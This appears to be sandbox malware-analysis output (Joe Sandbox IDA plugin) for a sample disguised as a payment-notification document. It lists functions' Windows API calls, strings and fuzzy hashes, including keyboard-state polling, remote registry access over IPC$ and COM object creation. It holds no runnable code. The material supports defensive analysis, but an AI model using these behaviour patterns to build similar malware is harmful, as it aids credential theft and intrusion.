LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00949866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0094984A
Line %d (File "%s"):, xrefs: 0094978F
^ ERROR, xrefs: 009497FB
Line %d:, xrefs: 009497A0
Error: , xrefs: 0094981D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 4fcdb397da235d22f3e50335ef6ed52816631f86fddef16c8a24599d71bfcacc
Instruction ID: 2f5f8a983d3946653d54a12117176e0c91f35d94d238ee65680bc975db973458
Opcode Fuzzy Hash: 4fcdb397da235d22f3e50335ef6ed52816631f86fddef16c8a24599d71bfcacc
Instruction Fuzzy Hash: 3B417D72804259AACB04FBE5DD86EEF7778FF56340F600025F605B2192EA646F48CB62

Function 009406DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009407A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009407BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009407DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00940804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0094082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00940837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0094083C

Strings

SOFTWARE\Classes\, xrefs: 0094070E
\IPC$, xrefs: 00940784
\CLSID, xrefs: 00940724

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
Instruction ID: 000a703c839b1a4a1b875f7d3829f3bf3f3eaed958cac41fe35b850e6875b7d7
Opcode Fuzzy Hash: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
Instruction Fuzzy Hash: 12414B72C10228ABCF15EFA4DC85CEEB778FF85750F554129E915A3161EB30AE44CBA1

Function 00963C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00963C5C
CoInitialize.OLE32(00000000), ref: 00963C8A
CoUninitialize.OLE32 ref: 00963C94
_wcslen.LIBCMT ref: 00963D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00963DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00963ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00963F0E
CoGetObject.OLE32(?,00000000,0097FB98,?), ref: 00963F2D
SetErrorMode.KERNEL32(00000000), ref: 00963F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00963FC4
VariantClear.OLEAUT32(?), ref: 00963FD8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
Instruction ID: eeecf090df5bd493aca17869421e9f1c0981b5a9cb500d2a485eee48661e4e56
Opcode Fuzzy Hash: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
Instruction Fuzzy Hash: B2C125B1608305AFD700DF68C88492BBBE9FF89744F14891DF98A9B251D731EE45CB52

Function 00957A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00957AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00957B8F
SHGetDesktopFolder.SHELL32(?), ref: 00957BA3
CoCreateInstance.OLE32(0097FD08,00000000,00000001,009A6E6C,?), ref: 00957BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00957C74
CoTaskMemFree.OLE32(?,?), ref: 00957CCC
SHBrowseForFolderW.SHELL32(?), ref: 00957D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00957D7A
CoTaskMemFree.OLE32(00000000), ref: 00957D81
CoTaskMemFree.OLE32(00000000), ref: 00957DD6
CoUninitialize.OLE32 ref: 00957DDC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 4f10f65d61a873c8832aae85ef4454748cc367881e78478167ade918f16e5c67
Instruction ID: cdf42c23b0d598ea32007278ce1e18d03305193d9eabe44192bee8f1a3086595
Opcode Fuzzy Hash: 4f10f65d61a873c8832aae85ef4454748cc367881e78478167ade918f16e5c67
Instruction Fuzzy Hash: C5C12B75A04209AFCB14DFA5D884DAEBBF9FF48305B148499E81ADB361D730EE45CB90

Function 0097541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00975504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00975515
CharNextW.USER32(00000158), ref: 00975544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00975585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0097559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009755AC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
Instruction ID: db4edbe1d2fdb4753202b19e0dfb16fc417fa7965ea901f555159bdf6ea00e01
Opcode Fuzzy Hash: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
Instruction Fuzzy Hash: 7F61C072904609EFDF508F50CC84AFE7BB9FF05720F518549F629A62A0D7B49A80DB60

Function 0093FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0093FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0093FB08
VariantInit.OLEAUT32(?), ref: 0093FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0093FB3A
VariantCopy.OLEAUT32(?,?), ref: 0093FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0093FBA1
VariantClear.OLEAUT32(?), ref: 0093FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0093FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBCC
VariantClear.OLEAUT32(?), ref: 0093FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBE9

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
Instruction ID: 167dcb07f6a5b366e233ecfe48edd4c58484b52e796e228bc7ff4a17ac0e3935
Opcode Fuzzy Hash: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
Instruction Fuzzy Hash: 04414F75E04219AFCB00DF68D8689AEBBB9FF48344F008069E959E7261DB34A945CF90

Function 00949C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00949CA1
GetAsyncKeyState.USER32(000000A0), ref: 00949D22
GetKeyState.USER32(000000A0), ref: 00949D3D
GetAsyncKeyState.USER32(000000A1), ref: 00949D57
GetKeyState.USER32(000000A1), ref: 00949D6C
GetAsyncKeyState.USER32(00000011), ref: 00949D84
GetKeyState.USER32(00000011), ref: 00949D96
GetAsyncKeyState.USER32(00000012), ref: 00949DAE
GetKeyState.USER32(00000012), ref: 00949DC0
GetAsyncKeyState.USER32(0000005B), ref: 00949DD8
GetKeyState.USER32(0000005B), ref: 00949DEA

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
Instruction ID: e419e3e6dfeb070023e542e9cef2bb30e508e38da1a8c11a6b9ba71a0db88330
Opcode Fuzzy Hash: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
Instruction Fuzzy Hash: 6641ED749087C96DFF319B60C844BB7BEE86F11344F04805EE6CA576C2D7A599C4C792

Function 0096055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009605BC
inet_addr.WSOCK32(?), ref: 0096061C
gethostbyname.WSOCK32(?), ref: 00960628
IcmpCreateFile.IPHLPAPI ref: 00960636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009606C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009606E5
IcmpCloseHandle.IPHLPAPI(?), ref: 009607B9
WSACleanup.WSOCK32 ref: 009607BF

Strings

Ping, xrefs: 00960676

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f55e0252088db35315e53bc4fa068f66b961bbfbd141071547922666b99e7bfa
Instruction ID: 3cfb6cedb31e3142c09fb169f04dcce0ebbf1a5862989ad2b3ecc8755de1006a
Opcode Fuzzy Hash: f55e0252088db35315e53bc4fa068f66b961bbfbd141071547922666b99e7bfa
Instruction Fuzzy Hash: 0C918C756082419FD320CF19D889F1ABBE4FF84318F1485A9F46A8B6A2C730ED41CF92

Function 00968CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00968CF3

Part of subcall function 00948E54: _wcslen.LIBCMT ref: 00948E77

_wcslen.LIBCMT ref: 00968D4E
_wcslen.LIBCMT ref: 00968D9C
_wcslen.LIBCMT ref: 00968DDC
_wcslen.LIBCMT ref: 00968E6E

Strings

none, xrefs: 00968E65, 00968E6A
winapi, xrefs: 00968D96, 00968D9B
cdecl, xrefs: 00968D48, 00968D4D
stdcall, xrefs: 00968DD6, 00968DDB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
Instruction ID: 46e879857f17c399457b43c38231ea2a83a661c1a97b8a17c3b0dcda21daca62
Opcode Fuzzy Hash: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
Instruction Fuzzy Hash: A251BF72A001169BCF24EF6CC9509BFB7A9BF65724B204729E966E72C0DB35DD40C7A0

Function 0096372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00963774
CoUninitialize.OLE32 ref: 0096377F
CoCreateInstance.OLE32(?,00000000,00000017,0097FB78,?), ref: 009637D9
IIDFromString.OLE32(?,?), ref: 0096384C
VariantInit.OLEAUT32(?), ref: 009638E4
VariantClear.OLEAUT32(?), ref: 00963936

Strings

NULL Pointer assignment, xrefs: 0096381E
Invalid parameter, xrefs: 00963865
Failed to create object, xrefs: 009637E4, 0096389A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: d6d9520a9303486c6b4d5074ad0ccfeed4e68fd18dad4097fcf8178d7354b30c
Instruction ID: 83d60fbbb1cb757801e59c3a170467d22e4a31e9652a08cf7e08e47b3d4d8b06
Opcode Fuzzy Hash: d6d9520a9303486c6b4d5074ad0ccfeed4e68fd18dad4097fcf8178d7354b30c
Instruction Fuzzy Hash: 17619071608311AFD310DF65C849FAABBE8EF89714F10881DF9859B291D770EE48CB92

Function 00953388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009533CF

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009533F0

Strings

Line %d (File "%s"):, xrefs: 00953443, 0095345C
"%s" (%d) : ==> %s:%s%s, xrefs: 00953504
^ ERROR , xrefs: 0095349E
"%s" (%d) : ==> %s:, xrefs: 00953522
Error: , xrefs: 009534D1
Incorrect parameters to object property !, xrefs: 009534AB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: ae708e6f94144dbd8dedc437ef50a47daa9dba781294ac7c4023ad6947c00250
Instruction ID: cd2287326320a41b52aeff50f4a3cd094614ba81fb9e81b70c64779308b5517b
Opcode Fuzzy Hash: ae708e6f94144dbd8dedc437ef50a47daa9dba781294ac7c4023ad6947c00250
Instruction Fuzzy Hash: D051DF32800249AADF15EBA5CD46EEEB7B8FF45340F244165F509B20A2EB312F58DB61

Function 0094B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0094B5FC
_wcslen.LIBCMT ref: 0094B608
_wcslen.LIBCMT ref: 0094B64D
_wcslen.LIBCMT ref: 0094B68C
_wcslen.LIBCMT ref: 0094B6C7

Strings

REMOVE, xrefs: 0094B602, 0094B607
APPEND, xrefs: 0094B6C1, 0094B6C6
EXISTS, xrefs: 0094B686, 0094B68B
KEYS, xrefs: 0094B647, 0094B64C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
Instruction ID: 06569ac1300098ff4f1c8b0337d24794073b5a2707730e5e3eff7002e96c5a76
Opcode Fuzzy Hash: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
Instruction Fuzzy Hash: AC41EC32A011279BCB205F7DC8909BE77A9BFA1B74B264529E921DB284E735CD81C790

Function 00955393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009553A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00955416
GetLastError.KERNEL32 ref: 00955420
SetErrorMode.KERNEL32(00000000,READY), ref: 009554A7

Strings

READY, xrefs: 00955460, 00955468
NOTREADY, xrefs: 0095544B
UNKNOWN, xrefs: 00955444
READONLY, xrefs: 00955452
INVALID, xrefs: 00955459

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
Instruction ID: 8b8b41149fcb1a22b1ebc98a8acc72f711b7373e802ce52645c2813b9bfaf0fb
Opcode Fuzzy Hash: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
Instruction Fuzzy Hash: 4231D675A006049FD710DF6AC894BA97BF8FF45306F198069E805CB2A3D771DD8ACB91

Function 00973C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00973C79
SetMenu.USER32(?,00000000), ref: 00973C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973D10
IsMenu.USER32(?), ref: 00973D24
CreatePopupMenu.USER32 ref: 00973D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973D5B
DrawMenuBar.USER32 ref: 00973D63

Strings

F, xrefs: 00973D4E
0, xrefs: 00973C54

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
Instruction ID: f78824ba80dc3afde11b800d0535cb077fb062869742d0dafa014b9054a7955b
Opcode Fuzzy Hash: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
Instruction Fuzzy Hash: 04417F76615205EFDB24CF54D844ADA77B9FF89350F14802CF94A973A0D771AA10EF90

Function 00941EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00941F64
GetDlgCtrlID.USER32 ref: 00941F6F
GetParent.USER32 ref: 00941F8B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00941F8E
GetDlgCtrlID.USER32(?), ref: 00941F97
GetParent.USER32(?), ref: 00941FAB
SendMessageW.USER32(00000000,?,00000111,?), ref: 00941FAE

Strings

ListBox, xrefs: 00941F21
ComboBox, xrefs: 00941EEC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
